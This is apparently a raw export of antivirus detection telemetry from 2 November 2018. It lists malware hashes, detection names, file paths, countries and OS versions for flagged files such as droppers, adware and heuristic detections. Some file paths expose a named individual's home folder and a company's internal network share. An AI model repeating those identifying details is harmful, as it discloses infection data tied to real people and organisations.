  Row(detection=Row(filename='2c9f9e2d93243fff2d209fb9bece4cc53c703688686962d69b3067c6546a729a', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\2C9F9E2D93243FFF2D209FB9BECE4CC53C703688686962D69B3067C6546A729A', filesize=2176000, name='HEUR/AGEN.1034483.#M1.#R1'), hash='2c9f9e2d93243fff2d209fb9bece4cc53c703688686962d69b3067c6546a729a', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-38.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-4.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\...\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-9.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-37.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T11:02:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='gppw.exe', filepath='C:\\MELSEC\\Gppw\\Gppw.exe', filesize=384000, name='HEUR/AGEN.1021917.#M1.#R1'), hash='2cb9d2290e29b021a245e0ed42ffc3bce9ab92bba0900ef1ae2d102bc5de545b', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2871808, timestamp='2018-11-02T09:33:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-173538-2c326241', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5097c88c\\AVSCAN-20181102-173501-2461B342\\AVSCAN-20181102-173538-2C326241', filesize=384000, name='TR/Gendal.5319612.#M1.#R1'), hash='2cb9d2290e29b021a245e0ed42ffc3bce9ab92bba0900ef1ae2d102bc5de545b', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:35:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-194025-416d4ff5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-193911-3877A267\\AVSCAN-20181102-194025-416D4FF5', filesize=1024000, name='Adware/CsdiMonetize.tygrq.#M1.#R1'), hash='2d0d1b5b0610e0163d0d7ac12d5c0810b882f929c789ae3d1b6039214139c2d4', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:40:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-194343-59b37cd2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-193911-3877A267\\AVSCAN-20181102-194343-59B37CD2', filesize=1024000, name='Adware/CsdiMonetize.tygrq.#M1.#R1'), hash='2d0d1b5b0610e0163d0d7ac12d5c0810b882f929c789ae3d1b6039214139c2d4', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:43:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-193945-3c90d6f6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-193911-3877A267\\AVSCAN-20181102-193945-3C90D6F6', filesize=1024000, name='Adware/CsdiMonetize.tygrq.#M1.#R1'), hash='2d0d1b5b0610e0163d0d7ac12d5c0810b882f929c789ae3d1b6039214139c2d4', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:39:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-194154-4c66b5e9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-193911-3877A267\\AVSCAN-20181102-194154-4C66B5E9', filesize=1024000, name='Adware/CsdiMonetize.tygrq.#M1.#R1'), hash='2d0d1b5b0610e0163d0d7ac12d5c0810b882f929c789ae3d1b6039214139c2d4', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:41:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-194151-4c031b78', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-193911-3877A267\\AVSCAN-20181102-194151-4C031B78', filesize=1024000, name='Adware/CsdiMonetize.tygrq.#M1.#R1'), hash='2d0d1b5b0610e0163d0d7ac12d5c0810b882f929c789ae3d1b6039214139c2d4', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:41:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-194218-4f524a36', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-193911-3877A267\\AVSCAN-20181102-194218-4F524A36', filesize=1024000, name='Adware/CsdiMonetize.tygrq.#M1.#R1'), hash='2d0d1b5b0610e0163d0d7ac12d5c0810b882f929c789ae3d1b6039214139c2d4', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:42:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-194218-4f44bc84', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-193911-3877A267\\AVSCAN-20181102-194218-4F44BC84', filesize=1024000, name='Adware/CsdiMonetize.tygrq.#M1.#R1'), hash='2d0d1b5b0610e0163d0d7ac12d5c0810b882f929c789ae3d1b6039214139c2d4', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:42:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-194207-4dff4db4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-193911-3877A267\\AVSCAN-20181102-194207-4DFF4DB4', filesize=1024000, name='Adware/CsdiMonetize.tygrq.#M1.#R1'), hash='2d0d1b5b0610e0163d0d7ac12d5c0810b882f929c789ae3d1b6039214139c2d4', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:42:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-194025-417e9849', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-193911-3877A267\\AVSCAN-20181102-194025-417E9849', filesize=1024000, name='Adware/CsdiMonetize.tygrq.#M1.#R1'), hash='2d0d1b5b0610e0163d0d7ac12d5c0810b882f929c789ae3d1b6039214139c2d4', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:40:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-194147-4b8d0092', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-193911-3877A267\\AVSCAN-20181102-194147-4B8D0092', filesize=1024000, name='Adware/CsdiMonetize.tygrq.#M1.#R1'), hash='2d0d1b5b0610e0163d0d7ac12d5c0810b882f929c789ae3d1b6039214139c2d4', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:41:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='2d6fd5b740a7f51298cd7047631a42895c721d95afd78155de062e58cc9df6ee', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\2D6FD5B740A7F51298CD7047631A42895C721D95AFD78155DE062E58CC9DF6EE', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='2d6fd5b740a7f51298cd7047631a42895c721d95afd78155de062e58cc9df6ee', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T11:19:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='2d6fd5b740a7f51298cd7047631a42895c721d95afd78155de062e58cc9df6ee', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\2D6FD5B740A7F51298CD7047631A42895C721D95AFD78155DE062E58CC9DF6EE', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='2d6fd5b740a7f51298cd7047631a42895c721d95afd78155de062e58cc9df6ee', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-38.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-4.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\...\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-9.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-37.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T11:13:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='2d6fd5b740a7f51298cd7047631a42895c721d95afd78155de062e58cc9df6ee', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\2D6FD5B740A7F51298CD7047631A42895C721D95AFD78155DE062E58CC9DF6EE', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='2d6fd5b740a7f51298cd7047631a42895c721d95afd78155de062e58cc9df6ee', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:45:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='start.exe', filepath='\\\\n5550\\kr-server\\廣羅\\kr-server\\server行政\\0管理部\\行政部\\工商萬用管理表格管理表格\\會計管理類\\start.exe', filesize=1536000, name='W32/Stanit.#M1.#R1'), hash='2d9810625653bfddbfe589aa06330e44380be67ed01cc09e73fcb41b2ba52f89', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:1upUepgZNU2jR\\\\\\/+9.1', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T01:02:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-035704-31643af4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_03248238\\AVSCAN-20181102-035515-1A5A3B07\\AVSCAN-20181102-035704-31643AF4', filesize=576000, name='TR/Agent.2d9bff.#M1.#R1'), hash='2d9bffb5b2cd0a3d0251d753856f11d6b3fc6a26eedd17c9bbbefe52eafce55b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T02:57:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='updater_zip_res2017042888uu_new[1].exe', filepath='\\\\?\\C:\\Windows\\SysWOW64\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\Updater_zip_res2017042888uu_new[1].exe', filesize=576000, name='HEUR/AGEN.1030714.#M1.#R1'), hash='2d9bffb5b2cd0a3d0251d753856f11d6b3fc6a26eedd17c9bbbefe52eafce55b', metadata=Row(cmdline=None, country='RS', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T19:39:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='updater_zip_res2017042888uu_new[1].exe', filepath='\\\\?\\C:\\Windows\\SysWOW64\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\Updater_zip_res2017042888uu_new[1].exe', filesize=576000, name='HEUR/AGEN.1030714.#M1.#R1'), hash='2d9bffb5b2cd0a3d0251d753856f11d6b3fc6a26eedd17c9bbbefe52eafce55b', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T17:51:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-112152-2e4ba9ce', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_997c82cc\\AVSCAN-20181102-112010-18AF2E51\\AVSCAN-20181102-112152-2E4BA9CE', filesize=576000, name='TR/Agent.2d9bff.#M1.#R1'), hash='2d9bffb5b2cd0a3d0251d753856f11d6b3fc6a26eedd17c9bbbefe52eafce55b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T10:21:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='updater_zip_res2017042888uu_new[1].exe', filepath='\\\\?\\E:\\Windows\\SysWOW64\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\INetCache\\IE\\Updater_zip_res2017042888uu_new[1].exe', filesize=576000, name='HEUR/AGEN.1030714.#M1.#R1'), hash='2d9bffb5b2cd0a3d0251d753856f11d6b3fc6a26eedd17c9bbbefe52eafce55b', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T00:55:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='updater_zip_res2017042888uu_new[1].exe', filepath='\\\\?\\C:\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\Updater_zip_res2017042888uu_new[1].exe', filesize=576000, name='HEUR/AGEN.1030714.#M1.#R1'), hash='2d9bffb5b2cd0a3d0251d753856f11d6b3fc6a26eedd17c9bbbefe52eafce55b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:41:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='updater_zip_res2017042888uu_new[1].exe', filepath='\\\\?\\C:\\Windows\\SysWOW64\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\Updater_zip_res2017042888uu_new[1].exe', filesize=576000, name='HEUR/AGEN.1030714.#M1.#R1'), hash='2d9bffb5b2cd0a3d0251d753856f11d6b3fc6a26eedd17c9bbbefe52eafce55b', metadata=Row(cmdline=None, country='RS', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T19:38:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='updater_zip_res2017042888uu_new[1].exe', filepath='\\\\?\\C:\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\Updater_zip_res2017042888uu_new[1].exe', filesize=576000, name='HEUR/AGEN.1030714.#M1.#R1'), hash='2d9bffb5b2cd0a3d0251d753856f11d6b3fc6a26eedd17c9bbbefe52eafce55b', metadata=Row(cmdline=None, country='RS', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T19:02:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T23:59:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T13:34:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T13:34:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T06:08:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T06:08:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T06:08:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T06:08:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T06:08:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T06:08:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T23:59:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T23:59:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T13:47:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T23:59:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T23:59:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T23:59:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T23:59:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T13:47:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T23:59:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T23:59:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T12:11:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T12:11:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T17:38:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T17:38:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T14:07:02Z'), dt=datetime.date(2018, 11, 2)),
